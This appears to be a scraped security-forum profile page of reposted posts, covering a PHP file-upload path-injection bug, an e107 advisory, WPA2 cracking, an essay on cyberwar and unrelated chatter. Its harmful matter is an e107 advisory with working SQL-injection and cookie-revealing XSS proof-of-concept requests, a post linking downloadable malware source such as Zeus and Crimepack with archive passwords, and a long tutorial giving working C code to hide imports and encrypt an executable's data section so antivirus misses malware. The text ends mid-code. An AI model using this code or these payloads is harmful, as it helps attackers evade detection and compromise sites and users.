Everything posted by Nytro

  1. File path injection in PHP <= 5.3.6 file upload (CVE-2011-2202)

Saturday, June 18, 2011

Since the thing went public before the new PHP version was released, I present full details of the latest PHP vulnerability I reported, together with a sweet demo exploit. The issue was found with fuzzing, as part of my recent file upload research. And I still have some more to show in the future. My thanks go to Paweł Goleń, who helped analyze the vulnerability.

The PHP part

The whole issue is tracked as PHP bug #54939, but the website is now down. The exemplary exploit is at pastebin. The nature of the bug is simple. PHP claims to remove the path component from HTTP file upload forms (transferred as MIME multipart/form-data requests), leaving only the file name given by the user agent. This is both for security and to fix an MSIE incompatibility (IE used to send the full path, like this: c:\WINDOWS\WHATEVER\My_file.txt). However, in 2008 PHP developers made an off-by-one error, and as a result, if a name starts with \ or / and has no other (back)slashes, it is left as-is. So this allows for:

/vmlinuz
/autorun.inf (/ will map to C:\ in Windows, the drive your PHP is run from)
/boot.ini

and other interesting file "names" to pass through.

The application part

Of course, what this means is simply that $_FILES[$input_field_name]['name'] will contain an unsanitized file path, and that's not enough to complete an exploit. A PHP script would need to use that filename as a destination for file writing. Unfortunately, at least a few applications do. I've found some pretty interesting examples. Among them is this AjaxFileUpload plugin. There are more applications with the same approach, just go on looking! AjaxFileUpload simply passes the given file "name" to move_uploaded_file(), which would try to create/overwrite a file in a root directory...

The set up part

And that will most likely fail, because of insufficient permissions. Who on Earth would allow PHP to write to root?

Well, the default Apache installation on Windows systems is run as the SYSTEM user (a.k.a. root). Also, on some shared hostings PHP is run in a chroot-ed environment, and / is the document root of a website (which allows for an easy site defacement). It's tricky, I agree, that's why this bug is very difficult to exploit in the wild (luckily). But it's possible!

Today's heroes:
- WAMP server, newest version (PHP 5.3.5), default install
- PHP <= 5.3.6 (5.3.5 in the demo)
- Windows XP
- AjaxFileUpload - a jQuery plugin that simulates asynchronous file uploads

In the exploit I simply show that (thanks to the vulnerable set up) I can overwrite c:\boot.ini and make the system unbootable. There are more advanced scenarios that could be done (essentially I can supply a boot record file to use on next boot), but it's not my area of expertise. To upload a file, the HTML5 arbitrary file upload technique was used.

So, patch your PHPs and bye!

Source and demo video: http://blog.kotowicz.net/2011/06/file-path-injection-in-php-536-file.html
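To make the off-by-one concrete, here is an added example in C; it is not from the post and it is not PHP's rfc1867.c, only a model of the behaviour the post describes. `strip_path_buggy` strips the path only when the last separator sits after index 0, so a lone leading `/` or `\` survives exactly as described; `strip_path_fixed` always keeps the final component and additionally rejects empty names, `.`, `..` and drive-relative names such as `c:boot.ini`, which is what a server-side upload handler should do before passing a name to `move_uploaded_file()`. The inputs in `main` are constructed.

```c
#include <stdio.h>
#include <string.h>

/* Last '/' or '\' in name, or NULL when there is none. */
static const char *last_separator(const char *name)
{
    const char *bs = strrchr(name, '\\');
    const char *fs = strrchr(name, '/');
    if (!bs) return fs;
    if (!fs) return bs;
    return fs > bs ? fs : bs;
}

/* Model of the faulty check the post describes: the path is stripped only when the last
 * separator sits after index 0, so a lone leading separator is treated as "no path". */
const char *strip_path_buggy(const char *name)
{
    const char *s = last_separator(name);
    if (s && s > name)
        return s + 1;
    return name;            /* "/boot.ini" and "\autorun.inf" come back unchanged */
}

/* Strict version: always keep only the final component, and refuse anything that is not
 * a plain file name (empty, ".", "..", or drive-relative such as "c:boot.ini"). */
const char *strip_path_fixed(const char *name)
{
    const char *s = last_separator(name);
    const char *base = s ? s + 1 : name;        /* a separator at index 0 is still a separator */
    if (base[0] == '\0') return NULL;           /* "", "dir/" */
    if (!strcmp(base, ".") || !strcmp(base, "..")) return NULL;
    if (strchr(base, ':')) return NULL;         /* "c:boot.ini" is relative to C:'s current directory */
    return base;
}

int main(void)
{
    /* constructed inputs: IE-style full path, the bug's triggers, a traversal and a normal name */
    const char *names[] = { "c:\\WINDOWS\\WHATEVER\\My_file.txt", "/boot.ini", "\\autorun.inf",
                            "/etc/passwd", "..", "report.pdf" };
    for (size_t i = 0; i < sizeof names / sizeof *names; i++) {
        const char *fixed = strip_path_fixed(names[i]);
        printf("%-36s buggy: %-16s fixed: %s\n", names[i], strip_path_buggy(names[i]),
               fixed ? fixed : "(rejected)");
    }
    return 0;
}
```

Both functions return a pointer into the caller's string, so a real handler would copy the result before use; the point is the comparison `s > name` versus `s ? s + 1 : name`, which is the whole difference between keeping and dropping a leading separator.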
  2. e107 0.7.25 Cross Site Scripting / SQL Injection

I think it is still fairly widely used...

Vulnerability ID: HTB23004
Reference: http://www.htbridge.ch/advisory/multiple_vulnerabilities_in_e107_1.html
Product: e107 website system
Vendor: e107 ( http://e107.org/ )
Vulnerable Version: 0.7.25 and probably prior
Tested on: 0.7.25
Vendor Notification: 25 May 2011
Vulnerability Type: Multiple Vulnerabilities
Risk level: Medium
Credit: High-Tech Bridge SA Security Research Lab ( http://www.htbridge.ch/advisory/ )

Vulnerability Details:

1. SQL injection in e107

The vulnerability exists due to failure in the "/e107_admin/users_extended.php" script to properly sanitize user-supplied input in the "user_field" variable. "magic_quotes" must be set to "off". An attacker can alter queries to the application's SQL database, execute arbitrary queries against the database, compromise the application, access or modify sensitive data, or exploit various vulnerabilities in the underlying SQL database. An attacker can use a browser to exploit this vulnerability.

The following PoC code is available:

POST /e107_admin/users_extended.php?cat= HTTP/1.1
Host: HOST
Cookie: <valid session cookies>
Content-Type: application/x-www-form-urlencoded
Content-Length:

user_field=sss','',0, ','','', '0', '253','0','0','253','0','0'),('0',(select user()),'',0,'','','','0','253','0','0','253','0','0'),('0','dfg&user_applicable=253&user_read=0&user_write=253&add_category=Add+category

2. XSS in e107

A user can execute arbitrary JavaScript code within the vulnerable application. The vulnerability exists due to failure in the "/e107_admin/users_extended.php" script to properly sanitize user-supplied input in the "user_include" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, or disclosure or modification of sensitive data. An attacker can use a browser to exploit this vulnerability.

The following PoC code is available:

poc.html
<script>
setTimeout("document.getElementById('f1').src='http://HOST/e107_admin/users_extended.php'",2000);
</script>
<iframe id=f1 src='form.html'></iframe>

form.html
<form method="POST" action="http://HOST/e107_admin/users_extended.php?editext" name=m>
<input type="hidden" name="user_field" value="abcde1f1">
<input type="hidden" name="user_text" value="12121">
<input type="hidden" name="user_type" value="1">
<input type="hidden" name="user_include" value='"><script>alert(document.cookie)</script>'>
<input type="hidden" name="add_field" value="1">
<input type="hidden" name="user_parent" value="0">
<input type="hidden" name="user_required" value="0">
<input type="hidden" name="user_applicable" value="255">
<input type="hidden" name="user_read" value="0">
<input type="hidden" name="user_write" value="253">
<input type="hidden" name="user_hide" value="0">
<input type=submit>
</form>
<script>
document.m.submit();
</script>

Source: e107 0.7.25 Cross Site Scripting / SQL Injection - Packet Storm
  3. Why SSDs are worth the money Here's a great, sweary presentation from Artur Bergman about the joy of using SSDs in your laptop and data-center, and how it's totally, absolutely worth the expense of replacing spinning drives with solid-state drives. I've been solid-state for more than a year, and I totally, absolutely agree. Video: http://www.boingboing.net/2011/06/17/why-ssds-are-worth-t.html
  4. Learn Python The Hard Way, 2nd Edition

This is the HTML preview of Learn Python The Hard Way, 2nd Edition. It is a work in progress and will most likely have some errors as I work on the full release of the 2nd Edition.

- The Hard Way Is Easier
- Exercise 0: The Setup
- Exercise 1: A Good First Program
- Exercise 2: Comments And Pound Characters
- Exercise 3: Numbers And Math
- Exercise 4: Variables And Names
- Exercise 5: More Variables And Printing
- Exercise 6: Strings And Text
- Exercise 7: More Printing
- Exercise 8: Printing, Printing
- Exercise 9: Printing, Printing, Printing
- Exercise 10: What Was That?
- Exercise 11: Asking Questions
- Exercise 12: Prompting People
- Exercise 13: Parameters, Unpacking, Variables
- Exercise 14: Prompting And Passing
- Exercise 15: Reading Files
- Exercise 16: Reading And Writing Files
- Exercise 17: More Files
- Exercise 18: Names, Variables, Code, Functions
- Exercise 19: Functions And Variables
- Exercise 20: Functions And Files
- Exercise 21: Functions Can Return Something
- Exercise 22: What Do You Know So Far?
- Exercise 23: Read Some Code
- Exercise 24: More Practice
- Exercise 25: Even More Practice
- Exercise 26: Congratulations, Take A Test!
- Exercise 27: Memorizing Logic
- Exercise 28: Boolean Practice
- Exercise 29: What If
- Exercise 30: Else And If
- Exercise 31: Making Decisions
- Exercise 32: Loops And Lists
- Exercise 33: While Loops
- Exercise 34: Accessing Elements Of Lists
- Exercise 35: Branches and Functions
- Exercise 36: Designing and Debugging
- Exercise 37: Symbol Review
- Exercise 38: Reading Code
- Exercise 39: Doing Things To Lists
- Exercise 40: Dictionaries, Oh Lovely Dictionaries
- Exercise 41: Gothons From Planet Percal #25
- Exercise 42: Gothons Are Getting Classy
- Exercise 43: You Make A Game
- Exercise 44: Evaluating Your Game
- Exercise 45: Is-A, Has-A, Objects, and Classes
- Exercise 46: A Project Skeleton
- Exercise 47: Automated Testing
- Exercise 48: Advanced User Input
- Exercise 49: Making Sentences
- Exercise 50: Your First Website
- Exercise 51: Getting Input From A Browser
- Exercise 52: Testing The Web Application
- Next Steps
- Advice From An Old Programmer
- Indices and tables: Index, Module Index, Search Page

Online: http://learnpythonthehardway.org/book/
  5. Cracking WPA2 Tutorial

June 16th, 2011 | By: Andrew Whitaker

In this video we will demonstrate how to crack WPA2 using the Airmon-ng suite. We will do it by:
- Identifying an access point
- Capturing traffic from that access point
- Attempting to capture the handshake. We have two options for doing this:
  - We can wait for a client to connect on their own
  - We can run a deauth attack to force them to disconnect, and then you can capture the handshake

Once you have captured the handshake, you can attempt to crack it with a word list or a rainbow table. The key can then be found from there. Enjoy.

Youtube: http://www.youtube.com/watch?v=pvjMJKUfAjo
Source: Cracking WPA2 Tutorial | InfoSec Resources

  6. Malware Sourcecode

Mpack: http://www.secguru.com/files/MPack_Toolkit_v0.94.rar (pass: infected)
Crimepack: MEGAUPLOAD - The leading online storage and file delivery service
IncognitoRat: http://incognitorat.com/db/Files
GhostRat: MEGAUPLOAD - The leading online storage and file delivery service
Exe2Vbs: PURGATORY VIRUS TEAM - Exe2Vbs v1.6
Zeus: http://www.mdl4.com/files/zeus.rar (pass: zeus)
Stuxnet: https://github.com/Laurelai/decompile-dump/zipball/master
ZeroAccess/Max++ (64Bit): http://resources.infosecinstitute.com/wp-content/uploads/Max++-downloader-install_2010.zip

Posted by Satyam Pujari a.k.a Satyamhax
Source: ::eSploit::: Malware Sourcecode
  7. Wow, I think C++ is the best-structured language from an OOP perspective. Maybe only C# can outdo it...
  8. I started with small programs in Visual Basic 6. Then I got hold of a 900-page book (Visual Basic 6 - Manualul programatorului) and one of about 700 pages (Visual Basic 5 - 1001 de exemple, something like that) and I understood the language. Testing various Windows APIs, reading the MSDN documentation, which at first I did not read but only guessed at what those functions did, I started to understand perfectly how things work. And I rummaged through a lot of source code, from which I learned a lot. Then I moved on to PHP, I read "Initiere in PHP 5" - Steve Holzner, then "PHP 4 in imagini", and I learned about everything I needed at the start. I already partly knew HTML, and from what I had done at school... And MySQL from the chapters dedicated to this RDBMS in the books listed. Over time I also read the documentation of many functions on php.net and the whole chapter on PHP 5 - OOP, and many other things on php.net. And I learned a thing or two from source code as well. I then moved on to a small JavaScript book, and I want to learn more advanced MySQL. I learned C++ in high school, but not much. Only this year did I get seriously into OOP (university) and it is the only subject I liked and in which I understood about all the nonsense, however small, from virtual inheritance to RTTI. I read "C++ manual complet" - Herbert Schildt, "C++ pentru incepatori volumul II" - Liviu Negreanu, I retained many ideas from "Secrete C++" - Constantin Galatean... I also read a book on Java, namely "Java de la 0 la expert", which seemed to me the best programming book I have read, and a book on Perl, but those languages did not grab me and I no longer remember much, I have hardly used them. On Linux, I don't know much shell scripting, just the basics, read in an article or two and from reading and modifying various system files. I cannot read books on the computer, I can't stand it, I prefer paper. And I like reading, I used to read literature too...

Anyway, this is my basic idea: learn from books! It is one thing for someone who has worked in the field for years to explain it to you, and another for 12-year-old Vasile, who understood from a tutorial that if you put "echo 'Plm';" then "Plm" appears on the site, to explain it. While we are at it: there is no point in learning a programming language if you do not work in it often. Build projects! As many and as complex as possible. Later you will find yourself wanting to get a job and... CV? What will you put in it? Projects matter a lot, however small. As a suggestion: write yourself a CV now. And you will see that you do not really have anything to put in it. Yes, you can say you know n programming languages, but at interviews they ask:
- C: write a C function that reverses a singly linked list
- C++: you are given an example with a virtual function and upcasting, and you have to say whether the code is correct or not (if you want to see how much crap can show up in OOP programs in C++, post here and you will see that it is not so easy to be a human compiler)
- PHP: you are given a class, an object is serialized and then deserialized, with the usual __sleep and __wakeup. What will be printed if such and such...
- PHP: you are given an abstract class, it is inherited but not all methods are implemented, blah blah...
Anyway, there are a lot of things. If you do not read serious documentation, i.e. a BOOK, there is no way you can know them. My advice: READ!
  9. It is nothing special, it should have been based on regular expressions, that would have been preferable. Anyway, there is no way it can detect a vulnerability exactly; it partially detects potentially vulnerable code. For example, SQL injection is found at queries, performed for instance with mysql_query. The program searches for these calls.
  10. Kaspersky Endpoint Security 8 for Linux launched

Security | 17 June 2011

Kaspersky Lab announces the launch of the business solution Kaspersky Endpoint Security 8 for Linux, which combines all the functionality of the previous version, Kaspersky Anti-Virus 5.7 for Linux, with that of Kaspersky Anti-Virus 5.5 for Samba. The product is administered through an intuitive graphical interface, fully compatible with the Gnome and KDE desktop ecosystems. The program's parameters can also be configured from the command line.

Kaspersky Endpoint Security 8 for Linux is part of the line of security solutions dedicated to companies and can be integrated into the organisation's security infrastructure. It is compatible with all Linux distributions, both 32-bit and 64-bit.

Kaspersky Endpoint Security 8 for Linux offers complete protection to workstations running Linux, thanks to the following innovations:
• The solution includes the new antivirus engine, Kaspersky Anti-Virus Engine 8.0, a heuristic analysis module and support for disinfecting files stored in archives.
• Kaspersky Endpoint Security 8 for Linux successfully neutralises threats targeting Linux operating systems, as well as those attacking Windows and Mac OS X platforms. The suite thus offers complete protection to the company's whole network, which also includes workstations not running only Linux.
• The new product includes the Kaspersky Administration Kit 8.0 console, a centralised management interface that allows remote administration, viewing reports and modifying global security policies.

"Kaspersky Endpoint Security 8 for Linux extends the opportunities available to companies in terms of IT security and allows them to implement systems for protecting the IT infrastructure, regardless of the operating platforms used on workstations. The new version of the product offers complete protection to Linux computers and includes the tools needed to configure, control and manage centralised security policies", said Teodor Cimpoeșu, Managing Director Kaspersky Lab Romania and Bulgaria.

Source: S-a lansat Kaspersky Endpoint Security 8 for Linux | Agora.ro
  11. For those looking for vulnerabilities in source code it is a godsend.
  12. They gathered 150,000 "fans" on Twitter. And had them call a certain number. The calls were redirected to the Wow Call Center, for instance. And they call themselves "1337"... Losers...
  13. I gave my opinion in another topic. There were some attacks on various sites that had already been claimed by "x" and "y", then these losers show up and say they are the "hackers". The same with pron.com, for example: I think it was first found by our own Tinko, then these losers show up to say they found it. Actually they don't even say it; it's just that some stinking turds from the press (to hell with the press) wake up and promote them,
  14. DDoS. Losers. It's still possible that they had nothing to do with it. Script kiddies. For example, they posted a phone number on Twitter, the losers called, and they redirected the calls to various call centers of certain companies. So "1337"... Kids with no future.
  15. Probably: - Florin Salam - Am norocul scris in frunte :->
  16. It takes us 2 minutes to make such a page, why would we pay for it? Yes, you came to the wrong place, you will not find clients for such junk here.
  17. JavaScript PDF Reader

Interesting idea...

Download: https://github.com/andreasgal/pdf.js
https://raw.github.com/andreasgal/pdf.js/master/pdf.js
  18. The Art of the Cyberwar

The development of new technologies, catching up with military interests, and the dependence of developed countries on existing technology set up a scenario where cyber war, or war in cyberspace, is becoming more important. All countries aware of the risks of such dependence have developed defense programs against attacks that could jeopardize critical national infrastructure. On the other hand, developing countries and major world powers are training computer security experts in various techniques of hacking, cracking, virology, etc., forming true experts in cyber warfare, called cyberwarriors. Nobody doubts that future wars will not be decided on land, at sea or in the air, but in cyberspace. The soldiers do not carry weapons or shields, but knowledge, and they deploy applications that wage war with viruses, disabling the enemy's critical systems, which are technologically dependent. This is the scenario the world is moving towards now, a scenario of technological dependence, where countries with more traditional military strength will be losing the ability to wage war to countries highly qualified in computer security and cyber techniques. This essay is intended as a point of reflection and knowledge about cyber warfare, based on the philosophy of Sun Tzu in The Art of War, adapting his knowledge to the technological scenario in which we live, so that we can get a modern compendium: The Art of Cyberwar.

Download: http://www.malwareint.com/docs/the-art-of-the-cyberwar-en.pdf
  19. Lulzsec

I no longer remember exactly what and how, but long before I had seen some "attacks" already "signed" by someone or other, which they decided to attribute to themselves. And they did this many times. The same with PlayStation: the data made public had first appeared in other places, then they woke up claiming they had hacked Sony's sites... And now they keep attributing to themselves whatever happens around the world. They are losers.
  20. LulzSec say a lot. They say they "hacked" everything that has been "hacked" for a long time up to the present. They are losers.
  21. Clever tricks against antiviruses

I bet you have come across some software you've made which you didn't want the AV to pick up. This article explains how to import from DLLs without having to call GetProcAddress, and also how to encrypt your data section.

Anti-viruses rely heavily on their heuristics if all other (signature) scans fail. The patterns they search for in your executable are the functions being imported, and the order they are being called in.

No imports!

Having no import table is relatively easy. There are however some functions I haven't imported dynamically, but which are very normal in any application (libc functions). The steps you need to do are:
- Get the kernel32 module base address. (kernel32.dll is always loaded when the process is started, and so is ntdll.dll)
- Make your own GetProcAddress
- Use it to find LoadLibrary's address, so that you can load other DLLs
- Make the functions usable in a practical way, so that you don't have to make a prototype for each of the functions that you will load

1. Get kernel32's base address

The first step is easy. There are lots of methods out there to retrieve the kernel32 base address, whose list of supported platforms varies greatly. I will be retrieving the address using the PEB (the linked list of the modules' initialization order).

Code:
// 32-bit x86 only: fs:[0x30] is the PEB of a 32-bit process (MSVC inline assembly)
void __declspec(naked) *kernel_addr()
{
    // Get kernel32 base address through PEB (initialization order)
    __asm {
        mov eax, fs:[0x30]   // PEB address
        mov eax, [eax+0x0c]  // PEB->Ldr
        mov eax, [eax+0x1c]  // Ldr.InInitializationOrderModuleList (ntdll)
        mov eax, [eax]       // [ntdll].Flink (kernel32)
        mov eax, [eax+0x08]  // kernel32 base address
        ret
    }
}

You can use whichever method you want, really, as long as the end result is the kernel32 base address.

2. Our own GetProcAddress

If you have ever had to deal with the PE format, you'd know that the exports have three main structures. These are the address table, the name table, and the ordinal table.

The address table is simply an array with RVAs to functions. There is one entry for every function exported. To get the real address, you add that RVA to the base address of the module.

The name table is another array with RVAs to the names of the functions. The names are just strings of characters terminated by a null byte. The problem is, the names' index doesn't always correspond to the functions' index. To retrieve the index, you use the ordinal table.

The ordinal table is basically just an array with an index to the corresponding function. For example EAT[0] might be the function with the name ENT[42]. In this case, EOT[42] has the value 0. So, the ordinal table is just another table, which maps a name to a function, using the name's index to retrieve the function's index.

Code:
void *my_gpa(HMODULE modl, char *fname)
{
    unsigned long modb = (unsigned long)modl;
    IMAGE_DOS_HEADER *dosh = (IMAGE_DOS_HEADER *)modb;
    IMAGE_NT_HEADERS *nth = (IMAGE_NT_HEADERS *)(modb+dosh->e_lfanew);
    // DataDirectory[0] is the export directory (IMAGE_DIRECTORY_ENTRY_EXPORT)
    IMAGE_EXPORT_DIRECTORY *ied = (IMAGE_EXPORT_DIRECTORY *)(modb+nth->OptionalHeader.DataDirectory->VirtualAddress);
    unsigned int i;

    for(i = 0; i < ied->NumberOfNames; i++) {
        // name table entry i: a 32-bit RVA to a NUL-terminated string
        const char *nn = (*(const char **)(ied->AddressOfNames+modb+i*sizeof(DWORD)))+modb;
        if(!strcmp(fname, nn)) {
            // ordinal table entry i: a 16-bit index into the address table
            unsigned short ordinal = *(unsigned short *)(ied->AddressOfNameOrdinals+modb+i*sizeof(unsigned short));
            return (void *)((unsigned long)*(DWORD *)(ied->AddressOfFunctions+modb+ordinal*sizeof(DWORD))+modb);
        }
    }
    return NULL;
}

In our code, modb is the base address of the module. Using that, we make our way to the export directory (ied), which contains the RVAs to the three tables we need. They are ied->AddressOfNames, ied->AddressOfFunctions and ied->AddressOfNameOrdinals. There's some pointer arithmetic going on there, along with some type casting. Our function works just like GetProcAddress. It takes a module base address and a function name, and returns a function address.

We iterate through each entry in the name table. The string is retrieved through nn: (RVA of the table + base address + i*4) + base address. Each entry in the table has the size of a word (32 bits = 4 bytes), so to get to the i'th entry, we add i*4. Once we've gotten to the i'th entry and dereferenced it, we add the base address to get the string's address. If the names are the same, get the ordinal the same way (except that one ordinal is the size of a short, 16 bits = 2 bytes). Then, using the ordinal as an index, retrieve the address of the function and return it.

3. Getting LoadLibrary's address

Easiest step. The code speaks for itself:

Code:
HMODULE (__stdcall *dyn_ll)(LPCTSTR lpFileName);
dyn_ll = my_gpa(kern, "LoadLibraryA");

4. Making it usable

You will probably want to load lots of functions, not just one or two. Writing the prototypes for all of them would be tedious. Let's make an array of functions for each module we will load, then let's also make a function to load the APIs into these arrays. I have used kernel32, user32, and winsock.

Code:
#include <windows.h>
#include <winsock2.h>
#include <string.h>
#include <stdlib.h>

// don't forget to specify the correct calling convention
char *fn_kernel[] = {
    "GetEnvironmentVariableA", // 0
    "GetModuleFileNameA",      // 1
    "GetTickCount",            // 2
    "GetLocalTime",            // 3
    "CreateThread",            // 4
    "SetThreadPriority",       // 5
};
unsigned long (__stdcall *func_kernel[sizeof(fn_kernel)/sizeof(*fn_kernel)])();

char *fn_user[] = {
    "MessageBoxA",         // 0
    "GetForegroundWindow", // 1
    "GetWindowTextA",      // 2
};
unsigned long (__stdcall *func_user[sizeof(fn_user)/sizeof(*fn_user)])();

char *fn_wsock[] = {
    "WSAStartup",    // 0
    "send",          // 1
    "connect",       // 2
    "socket",        // 3
    "gethostbyname", // 4
    "closesocket",   // 5
    "recv",          // 6
    "WSACleanup",    // 7
};
unsigned long (WSAAPI *func_wsock[sizeof(fn_wsock)/sizeof(*fn_wsock)])();

HMODULE (__stdcall *dyn_ll)(LPCTSTR lpFileName);

// kernel_addr() and my_gpa() exactly as in steps 1 and 2

void load_imports()
{
    HMODULE kern, user, wsock;
    unsigned long i;

    kern = kernel_addr();
    dyn_ll = my_gpa(kern, "LoadLibraryA");
    user = dyn_ll("user32.dll");
    wsock = dyn_ll("ws2_32.dll");

    for(i = 0; i < sizeof(fn_kernel)/sizeof(*fn_kernel); i++)
        func_kernel[i] = my_gpa(kern, fn_kernel[i]);
    for(i = 0; i < sizeof(fn_user)/sizeof(*fn_user); i++)
        func_user[i] = my_gpa(user, fn_user[i]);
    for(i = 0; i < sizeof(fn_wsock)/sizeof(*fn_wsock); i++)
        func_wsock[i] = my_gpa(wsock, fn_wsock[i]);
}

int main(int argc, char *argv[])
{
    WSADATA wsd;

    load_imports();
    // MessageBoxA
    func_user[0](0, "MessageBoxA has been called!", "0wn3d.", MB_OK);
    func_wsock[0](MAKEWORD(1, 0), &wsd); // WSAStartup
    // evil stuff here
    func_wsock[7];                       // WSACleanup
    return EXIT_SUCCESS;
}

Simple.

Encrypting your data section

This method is really easy, and of course it's not nearly as good as the average packer, but it keeps AVs away from your strings. I have used the RC4 cipher, but any symmetric stream cipher would do. We need to encrypt it from another separate program, and have our program decrypt itself.

Code for the encryption program:

Code:
#include <windows.h>
#include <imagehlp.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

#define DATA ".data"    // data section's name
#define KEY "DqHAI5VN"  // encryption key
#define NEW 0x11c8      // new ep rva
#define REP 0x5e4       // offset to patch with the old ep

void rc4_ksched(unsigned char *key, unsigned long keylen, unsigned char sbox[0x100])
{
    unsigned long i, j;

    for(i = 0; i < 0x100; i++)
        sbox[i] = (unsigned char)i;
    for(j = i = 0; i < 0x100; i++) {
        unsigned char tmp;
        j = (j + sbox[i] + key[i % keylen]) & 0xff;
        tmp = sbox[i]; sbox[i] = sbox[j]; sbox[j] = tmp;
    }
}

// the same routine encrypts and decrypts; the copy in the protected program must match it
void rc4(unsigned char sbox[0x100], unsigned char *src, unsigned char *dest, unsigned long len)
{
    unsigned long i, j;

    i = j = 0;
    while(len--) {
        unsigned char tmp;
        i = (i + 1) & 0xff;
        j = (j + sbox[i]) & 0xff;
        tmp = sbox[i]; sbox[i] = sbox[j]; sbox[j] = tmp;
        // standard RC4 indexes the S-box mod 256; the original listing had "% 0xff" (mod 255)
        *dest++ = *src++ ^ sbox[(sbox[i] + sbox[j]) & 0xff];
    }
}

int main(int argc, char *argv[])
{
    FILE *f = fopen("evil.exe", "r+b");
    IMAGE_DOS_HEADER dosh;
    IMAGE_NT_HEADERS nth;
    IMAGE_SECTION_HEADER sech, dummy;

    if(!f)
        return 1;
    memset(&dummy, 0, sizeof(dummy));
    fread(&dosh, 1, sizeof(dosh), f);
    fseek(f, dosh.e_lfanew, SEEK_SET);
    fread(&nth, 1, sizeof(nth), f);
    fread(&sech, 1, sizeof(sech), f);
    // walk the section table until an all-zero entry
    while(memcmp(&sech, &dummy, sizeof(dummy))) {
        // Name is 8 bytes and not necessarily NUL-terminated
        if(!strncmp((const char *)sech.Name, DATA, IMAGE_SIZEOF_SHORT_NAME)) {
            unsigned char sbox[0x100], *rd = malloc(sech.SizeOfRawData);
            DWORD ep, epaddr;

            rc4_ksched((unsigned char *)KEY, 8, sbox);
            fseek(f, sech.PointerToRawData, SEEK_SET);
            fread(rd, 1, sech.SizeOfRawData, f);
            rc4(sbox, rd, rd, sech.SizeOfRawData);
            fseek(f, sech.PointerToRawData, SEEK_SET);
            fwrite(rd, 1, sech.SizeOfRawData, f);
            free(rd);
            // point the entry point at new_ep ...
            epaddr = ((unsigned long)&nth.OptionalHeader.AddressOfEntryPoint-(unsigned long)&nth)+dosh.e_lfanew;
            fseek(f, epaddr, SEEK_SET);
            ep = NEW;
            fwrite(&ep, 1, 4, f);
            // ... and patch the placeholder in new_ep with the old entry point's VA
            fseek(f, REP, SEEK_SET);
            ep = nth.OptionalHeader.AddressOfEntryPoint+nth.OptionalHeader.ImageBase;
            fwrite(&ep, 1, 4, f);
            fclose(f);
            return EXIT_SUCCESS;
        }
        fread(&sech, 1, sizeof(sech), f);
    }
    fclose(f);
    return EXIT_FAILURE;
}

What it does is that it searches for the data section, and when found, it reads it into memory, encrypts it, and writes it back. But to be able to decrypt it we must have some piece of code in our own executable, which will decrypt the data section using our key, and then jump back to the old entry point.

Code:
// Lives in .data, so it reads back as the MSVC multi-char constant 'x86!' (little-endian)
// only while the section is still in the clear. Declared here because the original listing
// used it without defining it.
char magic[] = "!68x";

void decrypt_data(unsigned long mod)
{
    char data[6];
    IMAGE_DOS_HEADER *dosh = (IMAGE_DOS_HEADER *)mod;
    IMAGE_SECTION_HEADER *sech = (IMAGE_SECTION_HEADER *)(mod+dosh->e_lfanew+sizeof(IMAGE_NT_HEADERS));
    IMAGE_SECTION_HEADER dummy;

    // strings are built on the stack so that they do not sit in the (encrypted) data section
    data[0] = '.'; data[1] = 'd'; data[2] = 'a'; data[3] = 't'; data[4] = 'a'; data[5] = 0;
    memset(&dummy, 0, sizeof(dummy));
    while(memcmp(sech, &dummy, sizeof(dummy))) {
        if(!strncmp((const char *)sech->Name, data, IMAGE_SIZEOF_SHORT_NAME)) {
            unsigned char sbox[0x100], key[9];

            key[0] = 'D'; key[1] = 'q'; key[2] = 'H'; key[3] = 'A';
            key[4] = 'I'; key[5] = '5'; key[6] = 'V'; key[7] = 'N'; key[8] = 0;
            rc4_ksched(key, 8, sbox);
            rc4(sbox, (unsigned char *)mod+sech->VirtualAddress, (unsigned char *)mod+sech->VirtualAddress, sech->SizeOfRawData);
            return;
        }
        sech++;
    }
    exit(EXIT_FAILURE);
}

void __declspec(naked) *gba()
{
    __asm {
        mov eax, fs:[0x30]  // PEB address
        mov eax, [eax+0x08] // PEB->ImageBaseAddress
        ret
    }
}

void __declspec(naked) new_ep()
{
    if(*(unsigned long *)magic != 'x86!')
        decrypt_data((unsigned long)gba());
    __asm {
        push 0x41414141 // placeholder, patched with the old entry point
        ret
    }
}

And in main:

Code:
unsigned long nep_addr;

int main(int argc, char *argv[])
{
    WSADATA wsd;

    nep_addr = (unsigned long)&new_ep;
    load_imports();
    // MessageBoxA
    func_user[0](0, "MessageBoxA has been called!", "0wn3d.", MB_OK);
    func_wsock[0](MAKEWORD(1, 0), &wsd); // WSAStartup
    // evil stuff here
    func_wsock[7]();                     // WSACleanup
    return EXIT_SUCCESS;
}

We reference new_ep because otherwise the optimizing compiler would notice that it is not called anywhere and would not generate code for it. Here you will have to get some offsets. First compile the executable and disassemble it. Find the RVA of new_ep and put it in the encryption program source code (NEW). Then find the offset of the placeholder for the old entry point. The instruction will look like push 0x41414141. Add one to the address of that instruction, subtract the image base from it, subtract the RVA of the .text section from it, add the raw file offset of the .text section to it, and there you have your offset (REP). Now put it in the encryption source, compile it, run it, and everything is ready.

Well, that was everything. If you found this article helpful or have a question, feel free to post a comment.

The original article, nicer formatted: http://www.x-n2o.com/clever-tricks-against-antiviruses/
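The export-table walk from step 2 above, as an added example that is not part of the original article: a loader-independent resolver in portable C (no windows.h), run over a constructed 512-byte PE32 image rather than a real DLL. The image's name table is sorted while its function table is in a different order, so a correct lookup has to go through the ordinal table, which is exactly the EAT/ENT/EOT mapping the text describes. Unlike my_gpa, every RVA is bounds-checked against the image size, which matters as soon as the same code is pointed at an untrusted file instead of a module the loader has already mapped. RVAs are treated as offsets from the start of the buffer (a flat, mapped view); all names and addresses in the test image are made up.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Little-endian readers/writers so the image bytes are explicit and the code is endian-safe. */
static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t rd32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}
static void wr16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); }
static void wr32(uint8_t *p, uint32_t v) { for (int i = 0; i < 4; i++) p[i] = (uint8_t)(v >> (8 * i)); }

/* Resolve an export by name from a mapped PE image (RVA == offset from base).
 * Returns the function's RVA, or 0 if the image is malformed or the name is absent. */
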